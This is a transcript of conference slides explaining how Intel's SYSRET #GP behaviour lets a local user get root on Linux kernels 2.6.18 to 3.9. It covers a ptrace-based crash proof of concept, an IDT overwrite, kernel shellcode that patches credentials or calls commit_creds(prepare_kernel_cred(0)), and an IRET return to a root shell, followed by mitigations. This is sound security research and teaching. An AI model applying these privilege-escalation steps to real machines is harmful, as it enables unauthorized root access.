exploiting the linux kernel via intel's sysret implementation

Exploiting the Linux Kernel via Intel's SYSRET Implementation Niko@FluxFingers

Upload: nkslides

Post on 02-Jul-2015


DESCRIPTION

Intel's SYSRET implementation raises a #GP exception while still in ring0 when it is asked to return to a non-canonical address. If the kernel is not extra careful when returning to userland from a syscall, bad things can happen. Like root shells.

TRANSCRIPT

Page 1: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Exploiting the Linux Kernel via Intel's SYSRET Implementation
Niko@FluxFingers


Outline

●Syscalls and Context Switches
●Canonical Addresses
●SYSRET #GP Triggering
●Step by Step Exploitation and Rooting


Linux x86_64 Syscalls

●On old x86 processors, syscalls used int $0x80 with the number in %eax and parameters in %ebx, %ecx, etc.
○However, it’s super slow and got replaced with Intel’s SYSENTER mechanism
●x86_64 uses AMD’s SYSCALL with the number in %rax and parameters in %rdi, %rsi, %rdx, %r10, %r8, %r9 (%r10 takes the place of %rcx, because SYSCALL itself overwrites %rcx)
○Faster to handle than the whole interrupt path
○Intel CPUs adopted SYSCALL according to AMD’s specs since it became the standard syscall mechanism
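The register convention above can be exercised directly from userland. A minimal sketch, assuming x86_64 Linux and GCC/Clang inline assembly; raw_syscall3 is a hypothetical helper name, not part of any library.

```c
#include <sys/syscall.h>  /* SYS_getpid and other syscall numbers */
#include <unistd.h>       /* getpid(), used for comparison */

/* Hypothetical helper: issue a syscall with up to three arguments
 * directly via the SYSCALL instruction (x86_64 Linux only). */
static long raw_syscall3(long nr, long a1, long a2, long a3)
{
    long ret;
    __asm__ volatile (
        "syscall"
        : "=a"(ret)                            /* result comes back in %rax */
        : "a"(nr), "D"(a1), "S"(a2), "d"(a3)   /* number in %rax, args in %rdi, %rsi, %rdx */
        : "rcx", "r11", "memory");             /* SYSCALL overwrites %rcx (return %rip) and %r11 (RFLAGS) */
    return ret;
}
```

For example, raw_syscall3(SYS_getpid, 0, 0, 0) should return the same value as getpid(). A fourth argument would have to go in %r10, not %rcx.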


SYSCALL/SYSRET

●Whenever a syscall is invoked via SYSCALL, a context switch to kernel mode takes place
○When leaving the syscall, the kernel needs to restore specific userland registers
○And transfer back to ring3 with SYSRET

●SYSRET is fast since it “only” needs to:
○Load the saved %rip from %rcx (and RFLAGS from %r11)
○Switch %cs (and %ss) back to ring3 selectors

●The kernel itself has to make sure to restore all other userland registers, including %rsp, before executing SYSRET
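The %rcx bookkeeping described above is visible from userland: after a syscall returns, %rcx still holds the address of the instruction following SYSCALL. A hedged sketch for x86_64 Linux with GCC/Clang inline assembly; rcx_after_syscall is a hypothetical name.

```c
#include <sys/syscall.h>  /* SYS_getpid */

/* Hypothetical demo: performs getpid() via SYSCALL, stores the address of
 * the instruction right after SYSCALL in *next_insn and returns the value
 * %rcx holds once the syscall has returned. */
static unsigned long rcx_after_syscall(unsigned long *next_insn)
{
    long nr = SYS_getpid;
    unsigned long rcx, label;
    __asm__ volatile (
        "lea 1f(%%rip), %2\n\t"   /* remember where execution resumes */
        "syscall\n"
        "1:"
        : "+a"(nr), "=c"(rcx), "=&r"(label)
        :
        : "r11", "memory");       /* %r11 receives the saved RFLAGS */
    *next_insn = label;
    return rcx;
}
```

On Linux both values should match, because %rcx carries the saved %rip that SYSRET (or the IRET fallback) uses to return.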


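SYSCALL/SYSRET

[Figure: x86_64 address space of a process (/bin/cat): 0x0000000000000000 at the bottom; .text, .data, .bss and heap from 0x0000000000400000 (up to about 0x00000000006XXXXX); shared libraries around 0x00007fXXXXXXXXXX; stack around 0x00007ffffXXXXXXX; kernel memory from 0xffffffff80000000; VSYSCALL page at 0xffffffffff600000. The transition into kernel memory is labelled SYSCALL.]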


SYSCALL/SYSRET

[Figure: the same address-space layout; this time the transition from kernel memory back to the process is labelled SYSRET.]


How Linux handles SYSRET

●arch/x86/kernel/entry_64.S:

    ret_from_sys_call:
        movl $_TIF_ALLWORK_MASK,%edi
        ...
    sysret_check:
        ...
        movq RIP-ARGOFFSET(%rsp),%rcx
        CFI_REGISTER rip,rcx
        RESTORE_ARGS 1,-ARG_SKIP,0
        movq PER_CPU_VAR(old_rsp), %rsp
        USERGS_SYSRET64

●The kernel loads the saved user %rip into %rcx, restores the argument registers and the userland %rsp, and finally executes USERGS_SYSRET64 (swapgs followed by sysretq)


Canonical Addresses

●On x86_64, registers are 64 bits wide
●But virtual addresses, and therefore %rip, only use 48 bits
○48 bits == a balanced trade-off between page-table depth and addressable memory
●The leftover upper bits cannot be used freely
○(The NX bit at position 63 lives in page-table entries, not in addresses)
●Meaning the value of %rip has to be “canonical”, i.e. lie between
○0x0000000000000000 -> 0x00007FFFFFFFFFFF
○0xFFFF800000000000 -> 0xFFFFFFFFFFFFFFFF
●(Bits 48..63 have to be copies of bit 47)
●Non-canonical values in %rip are not allowed and will trigger exceptions in certain cases
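The canonical-address rule above reduces to a one-line check. A minimal sketch, assuming 48-bit virtual addresses (4-level paging; CPUs with 5-level paging extend this to 57 bits); is_canonical is a hypothetical helper name.

```c
#include <stdbool.h>
#include <stdint.h>

/* Canonical check for 48-bit virtual addresses:
 * bits 47..63 (17 bits) must be all zeros or all ones. */
static bool is_canonical(uint64_t addr)
{
    uint64_t top = addr >> 47;          /* bits 47..63 */
    return top == 0 || top == 0x1ffff;  /* 0x1ffff == seventeen one-bits */
}
```

For example, is_canonical(0x0000800000000000) is false: it is the first address past the lower canonical half.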


Non-canonical addresses and SYSRET

●Whenever SYSRET is executed with a non-canonical value in %rcx, the CPU has to raise a #GP

●AMD’s specs, however, never defined when exactly the #GP happens

●Clever researchers at Xen found out that AMD CPUs only fault once back in user mode

●Not so on Intel ...


Intel’s Version of SYSRET

●AMD’s specs omitted the check for non-canonical values in %rcx / %rip

●Intel decided to check for non-canonical values before the privilege level is changed, so the #GP is raised in ring0


Intel’s Version of SYSRET

●Triggering a #GP from kernel mode has consequences on Linux

●Recall that prior to executing SYSRET, Linux restores the userland %rsp and swaps %gs back

●Since the fault is taken in ring0, no stack switch happens: Intel’s SYSRET will #GP on the userland stack while still in ring0


#GP on userland %rsp

●#GP is an exception reached via an IDT entry (arch/x86/kernel/traps.c):

    set_intr_gate(X86_TRAP_GP, general_protection);

●Where general_protection resolves to the errorentry macro in arch/x86/kernel/entry_64.S:

    .macro errorentry sym do_sym
    ENTRY(\sym)
        XCPT_FRAME
        ASM_CLAC
        PARAVIRT_ADJUST_EXCEPTION_FRAME
        subq $ORIG_RAX-R15, %rsp
        CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15
        call error_entry
        ...


#GP on userland %rsp

●error_entry sets up an exception stack frame and backs up all registers:

    ENTRY(error_entry)
        XCPT_FRAME
        CFI_ADJUST_CFA_OFFSET 15*8
        cld
        movq_cfi rdi, RDI+8
        movq_cfi rsi, RSI+8
        movq_cfi rdx, RDX+8
        …

●where movq_cfi is defined as

    .macro movq_cfi reg offset=0
        movq %\reg, \offset(%rsp)
        CFI_REL_OFFSET \reg, \offset
    .endm


#GP on userland %rsp

●When setting up the stack frame, error_entry saves all general-purpose registers to x(%rsp) / [rsp+x]

●But the kernel had already restored the userland %rsp and registers before SYSRET

●=> Attacker-controlled register values are written to an attacker-chosen address while in ring0
●Classic opportunity for privilege escalation


Linux’ Protection against n/c %rip

●This behaviour already bit Linux in 2006 (CVE-2006-0744)

●To make sure no code ends up at a non-canonical address (or right before one), a guard page was introduced

●mmap(0x7ffffffff000, 4096, PROT_READ … will return ENOMEM

●This way SYSRET “shouldn’t” return to any non-canonical address
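The arithmetic behind the guard page: SYSCALL saves the address of the following instruction in %rcx, and SYSCALL itself is two bytes long (0f 05). A small sketch assuming 48-bit canonical addresses; rcx_after_syscall_at is a hypothetical helper. Without the guard page, a SYSCALL in the last two bytes of the page at 0x7ffffffff000 would hand SYSRET the non-canonical value 0x0000800000000000.

```c
#include <stdbool.h>
#include <stdint.h>

#define SYSCALL_INSN_LEN 2u  /* SYSCALL encodes as the two bytes 0f 05 */

/* Bits 47..63 must be all zeros or all ones (48-bit addressing assumed). */
static bool is_canonical(uint64_t addr)
{
    uint64_t top = addr >> 47;
    return top == 0 || top == 0x1ffff;
}

/* Value SYSCALL stores in %rcx (and SYSRET later loads into %rip)
 * for a SYSCALL instruction located at insn_addr. */
static uint64_t rcx_after_syscall_at(uint64_t insn_addr)
{
    return insn_addr + SYSCALL_INSN_LEN;
}
```

With the page at 0x7ffffffff000 unmappable, the highest possible SYSCALL sits at 0x7fffffffeffe and returns to the canonical 0x7ffffffff000.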


Linux’ Protection against n/c %rip

●Another option is using a “safe” IRET path for returning to ring3
○IRET requires a ring3 frame (saved %rip, %cs, RFLAGS, %rsp, %ss) on the stack to return to user code
○It is slower than SYSRET

●The ptrace interface forces the IRET path most of the time

●However, some syscalls still take the SYSRET path despite being ptraced

●One example is fork(), since it notifies the tracer via ptrace_event(), which does not force IRET
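For contrast, the choice between SYSRET and the safe IRET path can be written as a predicate over the saved user state. The sketch below is loosely modeled on the checks later Linux kernels perform before choosing SYSRET, not on the 3.x code discussed here; the struct, the MODEL_* constant names and the 4-level-paging limit are assumptions. A ptraced task whose %rip was set to a non-canonical value fails the address check and goes through IRET.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical subset of the user register state saved at syscall entry. */
struct user_regs_model {
    uint64_t ip, cx, flags, r11;
    uint16_t cs, ss;
};

#define MODEL_USER_CS       0x33                   /* assumed Linux x86_64 __USER_CS */
#define MODEL_USER_DS       0x2b                   /* assumed Linux x86_64 __USER_DS */
#define MODEL_TASK_SIZE_MAX 0x00007ffffffff000ULL  /* 4-level paging: user space ends below the guard page */
#define MODEL_EFLAGS_TF     0x00000100ULL          /* trap flag */
#define MODEL_EFLAGS_RF     0x00010000ULL          /* resume flag */

/* True if SYSRET would restore exactly this state; otherwise use IRET. */
static bool can_use_sysret(const struct user_regs_model *r)
{
    /* SYSRET takes %rip from %rcx and RFLAGS from %r11 */
    if (r->cx != r->ip || r->r11 != r->flags)
        return false;
    /* SYSRET loads fixed selectors derived from MSR_STAR */
    if (r->cs != MODEL_USER_CS || r->ss != MODEL_USER_DS)
        return false;
    /* a non-canonical or kernel-half %rip would make Intel's SYSRET #GP in ring0 */
    if (r->ip >= MODEL_TASK_SIZE_MAX)
        return false;
    /* SYSRET cannot restore RF, and TF would trap right after the return */
    if (r->flags & (MODEL_EFLAGS_TF | MODEL_EFLAGS_RF))
        return false;
    return true;
}
```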


Crash PoC

●fork() a child
●Child sets PTRACE_TRACEME
●Raises SIGSTOP
●Parent sets PTRACE_O_TRACEFORK
●Child fork()s again
●Parent catches this fork
●And uses PTRACE_SETREGS to set %rip to a non-canonical address
●Pivots %rsp to an arbitrary place
●And resumes the child with PTRACE_CONT
●fork() will return via SYSRET with a non-canonical %rcx
●CPU will #GP, page fault, double fault and panic


How to get root


The plan

●We need to get kernel code execution between the #GP and the panic

●Then repair the damage we have done
●Set the credentials of the current process to 0
●Return to userland
●And open a shell


The target

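●Since the #GP will always trigger a page fault and a double fault, we can pivot %rsp to the IDT so that error_entry’s register spill lands on IDT entries

●And set 2 specific registers to craft a fake IDT gate (a 64-bit gate is 16 bytes, i.e. two registers’ worth)
●That will be placed instead of the original page fault or double fault handler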


IDT Layout

●We can read IDTR with the sidt instruction
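The IDTR value and the location of individual gates can be computed as follows. A sketch assuming x86_64 and GCC/Clang; read_idtr and idt_gate_addr are hypothetical helpers, and the base address in the example is made up. Vectors 8 (#DF) and 14 (#PF) are the gates the plan targets. On CPUs with UMIP enabled, the kernel may refuse SIDT from user mode or answer it with a dummy value.

```c
#include <stdint.h>

/* Value stored by SIDT in 64-bit mode: 2-byte limit, 8-byte base. */
struct __attribute__((packed)) idtr64 {
    uint16_t limit;
    uint64_t base;
};

#define IDT_GATE_SIZE 16u  /* each 64-bit IDT gate is 16 bytes */
#define VEC_DF 8u          /* #DF, double fault */
#define VEC_GP 13u         /* #GP, general protection */
#define VEC_PF 14u         /* #PF, page fault */

/* Read IDTR from user mode (subject to UMIP, see above). */
static __attribute__((unused)) struct idtr64 read_idtr(void)
{
    struct idtr64 idtr;
    __asm__ volatile ("sidt %0" : "=m"(idtr));
    return idtr;
}

/* Address of the gate for a given vector. */
static uint64_t idt_gate_addr(uint64_t idt_base, unsigned vector)
{
    return idt_base + (uint64_t)vector * IDT_GATE_SIZE;
}
```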


IDT Gate Entry

●And set up a new gate with modified “Offset” fields
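Only the three offset fields have to change to redirect a gate. A sketch of the 16-byte descriptor layout described in the Intel SDM, with hypothetical helpers make_gate and gate_handler; the selector value 0x10 used in the example is assumed to be Linux's __KERNEL_CS.

```c
#include <stdint.h>

/* 64-bit IDT gate descriptor (16 bytes). */
struct idt_gate64 {
    uint16_t offset_low;   /* handler address bits 0..15 */
    uint16_t selector;     /* code segment selector */
    uint8_t  ist;          /* bits 0..2: Interrupt Stack Table index */
    uint8_t  type_attr;    /* bits 0..3 type, bits 5..6 DPL, bit 7 present */
    uint16_t offset_mid;   /* handler address bits 16..31 */
    uint32_t offset_high;  /* handler address bits 32..63 */
    uint32_t reserved;
};

#define GATE_INTR_PRESENT_DPL0 0x8e  /* present, DPL 0, 64-bit interrupt gate (type 0xe) */

/* Build a gate that points at handler. */
static struct idt_gate64 make_gate(uint64_t handler, uint16_t selector,
                                   uint8_t ist, uint8_t type_attr)
{
    struct idt_gate64 g = {
        .offset_low  = (uint16_t)(handler & 0xffff),
        .selector    = selector,
        .ist         = (uint8_t)(ist & 0x7),
        .type_attr   = type_attr,
        .offset_mid  = (uint16_t)((handler >> 16) & 0xffff),
        .offset_high = (uint32_t)(handler >> 32),
        .reserved    = 0,
    };
    return g;
}

/* Reassemble the handler address from the three offset fields. */
static uint64_t gate_handler(const struct idt_gate64 *g)
{
    return (uint64_t)g->offset_low
         | ((uint64_t)g->offset_mid << 16)
         | ((uint64_t)g->offset_high << 32);
}
```

For a handler at 0x401000 the fields become offset_low = 0x1000, offset_mid = 0x0040 and offset_high = 0.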


The target

●Before we trigger the #GP, we can allocate a landing area in userland

●Where we copy the code that will be executed
●Craft a fake IDT gate that points to this area
●Triggering the #GP will then overwrite e.g. the double fault entry with the fake gate
●And the kernel will jump to userland and execute our code with kernel privileges


Kernel Shellcode

● Inside this code we will have to swapgs in order to access kernel structures

●Then we carefully rebuild all IDT entries that were trashed in the overwrite process

●Then we can raise process credentials


Process structures

●Each process in userland has an associated kernel structure (thread_union) that holds its kernel stack:

[Figure: thread_union, containing thread_info and the kernel stack]


Process structures

●thread_info itself has a member that points to task_struct

[Figure: thread_info with members *task_struct and *exec_domain]


Process structures < 2.6.29

●task_struct contains lots of info about the running task

●and its credentials

[Figure: task_struct with members state, stack, usage, …, uid, gid, caps, …]


Process structures < 2.6.29

[Figure: combined view: thread_union (thread_info and kernel stack), whose thread_info (*task_struct, *exec_domain) points to task_struct (state, stack, usage, …, uid, gid, caps, …)]


Kernel Shellcode

●On < 2.6.29, raising process credentials is a matter of finding uid, gid and caps in task_struct

●And patching them to 0
●Luckily, in kernel mode %gs points to the per-CPU x8664_pda (/include/asm-x86/pda.h):

    /* Per processor datastructure. %gs points to it while the kernel runs */
    struct x8664_pda {
        struct task_struct *pcurrent;  /* 0 Current process */
        unsigned long data_offset;     /* 8 Per cpu data offset from linker address */
        unsigned long kernelstack;     /* 16 top of kernel stack for current */
        unsigned long oldrsp;          /* 24 user rsp for system call */
        int irqcount;                  /* 32 Irq nesting counter. Starts with -1 */
        int cpunumber;                 /* 36 Logical CPU number */
    #ifdef CONFIG_CC_STACKPROTECTOR
        unsigned long stack_canary;
    ...


Kernel Shellcode

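●%gs:0 holds the pointer to the current task_struct
●So we can simply:

    unsigned long ptr;
    uint32_t *cred;
    int i;

    asm("movq %%gs:0, %0" : "=r"(ptr));   /* x8664_pda.pcurrent */
    cred = (uint32_t *)ptr;

    /* look for uid, euid, suid, fsuid followed by gid, egid, sgid, fsgid */
    for (i = 0; i < 1000; i++, cred++) {
        if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid &&
            cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) {
            cred[0] = cred[1] = cred[2] = cred[3] = 0;   /* uids -> root */
            cred[4] = cred[5] = cred[6] = cred[7] = 0;   /* gids -> root */
            break;
        }
    }

●Where uid/gid are the values returned by getuid() and getgid()
●And our process will be root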
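The scan itself can be tried out in user space against a fake buffer. A hedged model, not kernel code: patch_id_block is a hypothetical name and the array merely stands in for task_struct. Unlike the loop above, it bounds the scan by the buffer length so it never reads past the end.

```c
#include <stddef.h>
#include <stdint.h>

/* User-space model of the heuristic: find four consecutive copies of uid
 * followed by four copies of gid, zero all eight words and return the
 * index of the first one, or -1 if the pattern does not occur. */
static long patch_id_block(uint32_t *words, size_t n, uint32_t uid, uint32_t gid)
{
    for (size_t i = 0; i + 8 <= n; i++) {
        uint32_t *c = words + i;
        if (c[0] == uid && c[1] == uid && c[2] == uid && c[3] == uid &&
            c[4] == gid && c[5] == gid && c[6] == gid && c[7] == gid) {
            for (int j = 0; j < 8; j++)
                c[j] = 0;
            return (long)i;
        }
    }
    return -1;
}
```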


Kernel Shellcode

●On kernels newer than 2.6.29, x8664_pda is removed
●And task_struct contains a new member called cred (credential records)
●If %rsp wasn’t modified, we could walk back to the base of the thread_union to find thread_info
●And do heuristic scanning to find thread_info->task_struct->cred->uid/gid
●However, credential records come with two new functions
●prepare_kernel_cred / commit_creds
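Walking back to thread_info amounts to rounding the stack pointer down to the start of the thread_union. A sketch assuming a power-of-two, size-aligned thread_union with thread_info at its lowest address (8 KiB was the usual x86_64 THREAD_SIZE in this era; later kernels use 16 KiB); thread_info_from_sp is a hypothetical name.

```c
#include <stdint.h>

/* Round an in-stack address down to the start of its thread_union,
 * where thread_info lives. thread_size must be a power of two. */
static uint64_t thread_info_from_sp(uint64_t sp, uint64_t thread_size)
{
    return sp & ~(thread_size - 1);
}
```

This only works while %rsp still points into the kernel stack, which is exactly what the pivot in this exploit destroys.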


Kernel Shellcode

●prepare_kernel_cred(0) creates a fresh credentials structure with root privileges

●commit_creds installs the new cred on the current task

●Both symbols can be looked up in /proc/kallsyms or /boot/System.map

●Kernel shellcode just needs to call

    commit_creds(prepare_kernel_cred(0));

●And we’re root again
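Both files list one symbol per line as address, type letter and name. A small parsing sketch with hypothetical helpers parse_symbol_line and line_defines; the address in the example is made up. On newer kernels, kptr_restrict may cause unprivileged readers to see all-zero addresses.

```c
#include <stdio.h>   /* sscanf */
#include <string.h>  /* strcmp */

/* Parse one line in /proc/kallsyms or System.map format:
 * "<hex address> <type letter> <symbol>" (kallsyms may append "[module]").
 * Returns 1 on success, 0 otherwise. */
static int parse_symbol_line(const char *line, unsigned long long *addr,
                             char *type, char name[128])
{
    return sscanf(line, "%llx %c %127s", addr, type, name) == 3;
}

/* Returns 1 and stores the address if line defines the symbol wanted. */
static int line_defines(const char *line, const char *wanted, unsigned long long *addr)
{
    char type;
    char name[128];
    return parse_symbol_line(line, addr, &type, name) && strcmp(name, wanted) == 0;
}
```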


Kernel Shellcode

●Next we have to cleanly return to userland

●Easiest method is to use IRET:

    __asm__ __volatile__(
        "movq %0, 0x20(%%rsp);"   /* SS */
        "movq %1, 0x18(%%rsp);"   /* RSP */
        "movq %2, 0x10(%%rsp);"   /* RFLAGS */
        "movq %3, 0x08(%%rsp);"   /* CS */
        "movq %4, 0x00(%%rsp);"   /* RIP */
        "swapgs;"                 /* restore the userland %gs base */
        "iretq;"
        /* "i" operands must be constants that fit a sign-extended 32-bit immediate */
        :: "i"(USER_SS), "i"(user_stack), "i"(USER_FL), "i"(USER_CS), "i"(user_code)
    );

●Where user_code points to memory in userland that should be executed when the kernel exits
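The offsets in the asm above follow the frame IRETQ pops from the stack, lowest address first. A sketch of that layout as a C struct; the selector values 0x33 and 0x2b in the example are assumed to be Linux's x86_64 __USER_CS and __USER_DS, and returns_to_ring3 is a hypothetical helper.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* The five quadwords IRETQ pops, lowest address first. */
struct iret_frame {
    uint64_t rip;     /* 0x00: user_code */
    uint64_t cs;      /* 0x08: USER_CS */
    uint64_t rflags;  /* 0x10: USER_FL */
    uint64_t rsp;     /* 0x18: user_stack */
    uint64_t ss;      /* 0x20: USER_SS */
};

/* Returning to ring3 requires RPL 3 (low two bits) in both selectors. */
static bool returns_to_ring3(const struct iret_frame *f)
{
    return (f->cs & 3) == 3 && (f->ss & 3) == 3;
}
```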


Popping uid=0(root)

●user_code can do anything now since it runs as root

●So we can simply execve("/bin/sh") from there
●However, that happens inside the traced child, so we have to bring the root shell back to the parent
●Or we just use chmod() (setuid bit) or setxattr() (file capabilities) to drop a root shell


Demo Time


Limitations

●These techniques work well with 2.6.18 to 3.9.x
●3.10 mitigates the IDT attack by remapping the IDT read-only (arch/x86/kernel/traps.c):

    __set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO);
    idt_descr.address = fix_to_virt(FIX_RO_IDT);

●CPUs with SMEP/SMAP fault when ring0 executes (SMEP) or accesses (SMAP) userland memory

●Grsecurity provides a handful of protections that make this bug a pain to exploit
○GRKERNSEC_RANDSTRUCT
○PAX_MEMORY_UDEREF
○GRKERNSEC_HIDESYM
○...


Further thoughts

●The Linux fix is weird (it “only” forces ptrace_stop() to use IRET)

●Syscalls can still return via SYSRET
●Also, the SYSRET behaviour itself is still present
●Since it’s a hardware issue, it might be present in other OSes in different variations (OHAI 2006)
●Anyone want to check FreeBSD …?


Questions?